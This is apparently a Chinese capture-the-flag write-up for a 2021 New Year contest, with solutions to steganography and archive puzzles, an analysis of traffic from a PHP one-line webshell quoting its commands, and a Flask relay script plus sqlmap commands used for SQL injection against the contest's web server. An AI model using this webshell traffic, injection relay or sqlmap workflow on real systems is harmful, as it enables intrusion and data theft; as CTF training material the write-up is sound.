Misc
签到
http://106.55.249.213:5002/
祝各位大佬,大大佬,新春快乐!
2021 更加牛13!!!
flag在短片中:flag{Happy_New_Year_2021}
Flag不在这
Flag真的不在这,你要相信我,知道吗!
打开显示
Flag不在这!
于是放入010发现是个压缩包,打开发现flag.txt:flag{It's_real_easy!D0_Y0u_Like_it?}
牛年大吉
要相信自己,他就是flag!
查看属性发现flag:flag{这个就是哦!}
网络深处
网络深处! 千万不要一个人大晚上做哦!!!
2020UNCTF原题就不写了.滑稽.jpg
拼图
你也喜欢鬼刀吗?
montage合成 + gaps对大图遗传算法解拼图
①.montage(Windows)(PS:将其改为1200X1200)
montage "D:\Harvey\赛题\SXCCTF\杂项\zip\拼图\*.png" -tile 10x10 -geometry +0+0 result.png
②.gaps(kali)解得flag:flag{123A4X5b6cLi}
安装命令
git clone https://github.com/nemanja-m/gaps.git
cd gaps
sudo python3 setup.py install
拼图命令
gaps --image=/home/kali/Desktop/result.png --generation=30 --population=300 --size=120
Very very easy hex
Very very easy hex!! Enjoy it!!!
套娃解压缩包,先写个循环解压的脚本解出168张图
附上脚本
import zipfile
import re
zipname = "img.zip"
while True:
ts1 = zipfile.ZipFile(zipname)
ts1.extractall("./")
zipname = "./"+ts1.namelist()[0]
解法一:菜鸡做法
接着发现这些图片hex就 04083A00 和 012040D0 两种格式
于是将其分别标注为0/1得到如下:
011001100110110001100001011001110111101101000100001100000101111101111001001100000111010101011111011011000110100101101011011001010101111101101001011101000011111101111101
最后转成字符串得到flag:flag{D0_y0u_like_it?}
解法二:大佬只需一个脚本梭哈QAQ
跑下脚本得到flag:flag{D0_y0u_like_it?}
附上脚本
from PIL import Image
binstr=''
for i in range(168):
img=Image.open(str(i)+'.png')
char=img.getpixel((0,0))
if char==(0, 0, 0, 255):
binstr+='0'
else:
binstr+='1'
if len(binstr)>=8:
print(chr(int(binstr,2)),end='')
binstr=''
YLBNB
你会喜欢他的! :)
原题by UNCTF2020-YLB绝密文件
不会复现.jpg
Love_it!
文件较大,选择网盘下载(手动狗头)
蓝奏:https://wws.lanzous.com/iy5T6lf343g 密码:gbmf
百度云:链接: https://pan.baidu.com/s/1wT3bVls2X_5bOSBaxBK91A 提取码: ufrs 复制这段内容后打开百度网盘手机App,操作更方便哦解压密码为:2021_jia_you!!
flag 为 flag{后台名称_后台账号_后台密码_一句话木马名称_一句话密码_第三个马子执行的命令}
例如:
后台网址为:
http://127.0.0.1/admin/index.php 后台名称就为: admin
账号为:2021 后台账号为: 2021
密码为:happy_new_year! 后台密码为: happy_new_year!
一句话木马路径为: http://127.0.0.1/mu.php 一句话木马名称为: mu
一句话木马 一句话密码为: starsnow
一句话执行的命令
连接马子 之后执行的第三条 命令
第一条 yingzi=phpinfo();
第二条 yingzi=system('whoami');
第三条 yingzi=system('ls'); 第三个马子执行的命令: system('ls');例如:
flag{admin_2021_happy_new_year!_starsnow_system('ls');}
由题可知流量里面有传马
于是在筛选http下进行搜集题目所要求的信息
后台名:dede;后台账号:admin;密码:starsnowniubi
一句话木马名称:ma
一句话密码:yingzi;第三个马子执行的命令:echo `whoami`
最终整合得到flag:
flag{dede_admin_starsnowniubi_ma_yingzi_echo `whoami`;}
Web
base
106.55.249.213:5001
BaseBaseBase
你遇见过渗透中传输值为加密的嘛?
打开链接发现他还带有参数后面,再根据题目信息,于是我尝试了各种base,无果
http://106.55.249.213:5001?user=QgcAYAbgbw/
Sorry,you are not admin!you are Guest
最后试了试robots.txt发现了个base.txt
接着将其保存下来,组合成一个字典得到admin=XAXwaAZAaQ
附上脚本
import requests
res="{"
with open("base.txt", 'r') as f:
a = f.readlines()
for i in a:
tmp = i.strip("\n")
url = 'http://106.55.249.213:5001/?user='+tmp
# print(url)
r = requests.get(url)
z = r.text[32:]
if z!='':
k = f'"{z}":"{tmp}",'
res += k
res=res[:-1]
res+="}"
print(res)
经大佬指点得知需要整个flask脚本实现中转注入
附上脚本
import requests
from flask import Flask,request
app = Flask(__name__)
a = {" ": "CA", "!": "HA", "": "HQ", "#": "Hg", "$": "Hw", "%": "IA", "&": "IQ", "'": "Ig", "(": "Iw", ")": "JA",
"*": "JQ", "+": "Jg", ",": "Jw", "-": "KA", ".": "KQ", "/": "Kg", "0": "Kw", "1": "LA", "2": "LQ", "3": "Lg",
"4": "Lw", "5": "MA", "6": "MQ", "7": "Mg", "8": "Mw", "9": "NA", ":": "NQ", ";": "Ng", "<": "Nw", "=": "OA",
">": "OQ", "?": "Og", "@": "Ow", "A": "PA", "B": "PQ", "C": "Pg", "D": "Pw", "E": "QA", "F": "QQ", "G": "Qg",
"H": "Qw", "I": "RA", "J": "RQ", "K": "Rg", "L": "Rw", "M": "SA", "N": "SQ", "O": "Sg", "P": "Sw", "Q": "TA",
"R": "TQ", "S": "Tg", "T": "Tw", "U": "UA", "V": "UQ", "W": "Ug", "X": "Uw", "Y": "VA", "Z": "VQ", "[": "Vg",
"\\": "Vw", "]": "WA", "^": "WQ", "_": "Wg", "`": "Ww", "a": "XA", "b": "XQ", "c": "Xg", "d": "Xw", "e": "YA",
"f": "YQ", "g": "Yg", "h": "Yw", "i": "ZA", "j": "ZQ", "k": "Zg", "l": "Zw", "m": "aA", "n": "aQ", "o": "ag",
"p": "aw", "q": "bA", "r": "bQ", "s": "bg", "t": "bw", "u": "cA", "v": "cQ", "w": "cg", "x": "cw", "y": "dA",
"z": "dQ", "{": "dg", "|": "dw", "}": "eA", "~": "eQ", "": "eg", "聙": "ew", "聛": "fA", "聜": "fQ", "聝": "fg",
"聞": "fw", "聟": "gA", "聠": "gQ", "聡": "gg", "聢": "gw", "聣": "hA", "聤": "hQ", "聥": "hg", "聦": "hw", "聧": "iA",
"聨": "iQ", "聫": "ig", "聬": "iw", "聭": "jA", "聮": "jQ", "聯": "jg", "聰": "jw", "聲": "kA", "聳": "kQ", "聴": "kg",
"聵": "kw", "聶": "lA", "職": "lQ", "聸": "lg", "聹": "lw", "聺": "mA", "聻": "mQ", "聼": "mg", "聽": "mw", "隆": "nA",
"垄": "nQ", "拢": "ng", "陇": "nw", "楼": "oA", "娄": "oQ", "搂": "og", "篓": "ow", "漏": "pA", "陋": "pQ", "芦": "pg",
"卢": "pw", "颅": "qA", "庐": "qQ", "炉": "qg", "掳": "qw", "卤": "rA", "虏": "rQ", "鲁": "rg", "麓": "rw", "碌": "sA",
"露": "sQ", "路": "sg", "赂": "sw", "鹿": "tA", "潞": "tQ", "禄": "tg", "录": "tw", "陆": "uA", "戮": "uQ", "驴": "ug",
"脌": "uw", "脕": "vA", "脗": "vQ", "脙": "vg", "脛": "vw", "脜": "wA", "脝": "wQ", "脟": "wg", "脠": "ww", "脡": "xA",
"脢": "xQ", "脣": "xg", "脤": "xw", "脥": "yA", "脦": "yQ", "脧": "yg", "脨": "yw", "脩": "zA", "脪": "zQ", "脫": "zg",
"脭": "zw", "脮": "0A", "脰": "0Q", "脳": "0g", "脴": "0w", "脵": "1A", "脷": "1Q", "脹": "1g", "脺": "1w", "脻": "2A",
"脼": "2Q", "脽": "2g", "脿": "2w", "谩": "3A", "芒": "3Q", "茫": "3g", "盲": "3w", "氓": "4A", "忙": "4Q", "莽": "4g",
"猫": "4w", "茅": "5A", "锚": "5Q", "毛": "5g", "矛": "5w", "铆": "6A", "卯": "6Q", "茂": "6g", "冒": "6w", "帽": "7A",
"貌": "7Q", "贸": "7g", "么": "7w", "玫": "8A", "枚": "8Q", "梅": "8g", "酶": "8w", "霉": "9A", "煤": "9Q", "没": "9g",
"眉": "9w"}
def encode(s):
s=str(s)
res = ''
for i in s:
res += a[i]
return res
@app.route('/')
def hello_world():
id=encode(request.args.get('id'))
url='http://106.55.249.213:5001/?user=XAXwaAZAaQ&id='+id
return requests.get(url=url).text
app.run(debug=True,port=3389)
先本地跑下flask脚本
接着就是sqlmap查下表就能得到flag:flag{SXC is very funny!}
python sqlmap.py -u http://127.0.0.1:3389?id=1
python sqlmap.py -u http://127.0.0.1:3389?id=1 --dump p id
PS:艹,我这kali2020的sqlmap是假的,跑了十几分钟结果没跑出了
0 条评论